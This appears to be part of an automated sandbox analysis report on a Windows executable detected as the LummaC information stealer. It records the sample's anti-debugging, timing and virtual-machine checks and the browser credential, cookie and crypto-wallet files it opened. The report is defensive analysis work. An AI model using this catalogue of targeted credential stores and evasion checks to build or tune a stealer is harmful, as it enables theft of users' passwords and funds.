            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E10 second address: 4A10E3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2E7D257EC1h 0x00000009 jmp 00007F2E7D257EBBh 0x0000000e popfd 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E3B second address: 4A10E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E3F second address: 4A10E5A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2E7D257EC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E5A second address: 4A10E85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2E7D1D3442h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007F2E7D1D343Bh 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E85 second address: 4A10E8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E8B second address: 4A10E91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10E91 second address: 4A10E95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Tries to evade debugger and weak emulator (self modifying code)
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 2859D8 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 433412 instructions caused by: Self-modifying code
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 6564Thread sleep time: -30015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 6832Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exe TID: 6832Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
            Source: file.exe, file.exe, 00000000.00000002.1193856188.000000000040A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
            Source: file.exe, 00000000.00000003.1011286010.000000000543D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
            Source: file.exe, 00000000.00000003.919467475.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1136696312.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1136637956.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1137219703.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1194590442.0000000000AA3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187351626.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187295208.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193325992.0000000000AA2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
            Source: file.exe, 00000000.00000002.1194341229.0000000000A58000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWx]
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
            Source: file.exe, 00000000.00000002.1193856188.000000000040A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
            Source: file.exe, 00000000.00000003.1011286010.0000000005438000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
            Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

            Anti Debugging

            barindex
            Hides threads from debuggers
            Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
            Tries to detect sandboxes and other dynamic analysis tools (window names)
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
            Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
            Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
            Source: C:\Users\user\Desktop\file.exeFile opened: SICE
            Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
            Source: file.exe, file.exe, 00000000.00000002.1193856188.000000000040A000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: 0yProgram Manager
            Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: file.exe, 00000000.00000002.1194679901.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1193577853.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187560030.0000000000A74000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187388354.0000000000AAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187351626.0000000000AA0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187295208.0000000000A98000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187650092.0000000000B04000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1187185183.0000000000B04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\Desktop\file.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected LummaC Stealer
            Source: Yara matchFile source: Process Memory Space: file.exe PID: 6392, type: MEMORYSTR
            Source: Yara matchFile source: 0.2.file.exe.220000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000000.00000002.1193780599.0000000000221000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
            Found many strings related to Crypto-Wallets (likely being stolen)
            Source: file.exe, 00000000.00000003.1136696312.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
            Source: file.exe, 00000000.00000003.1136696312.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
            Source: file.exeString found in binary or memory: Jaxx Liberty
            Source: file.exe, 00000000.00000003.1136696312.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
            Source: file.exe, 00000000.00000003.1136696312.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: file.exe, 00000000.00000003.1136696312.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
            Source: file.exe, 00000000.00000003.1136696312.0000000000AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
            Source: file.exe, 00000000.00000003.1136637956.0000000000A8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
            Source: file.exe, 00000000.00000003.1136637956.0000000000A8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cert9.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\formhistory.sqliteJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\logins.jsonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\prefs.jsJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
            Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
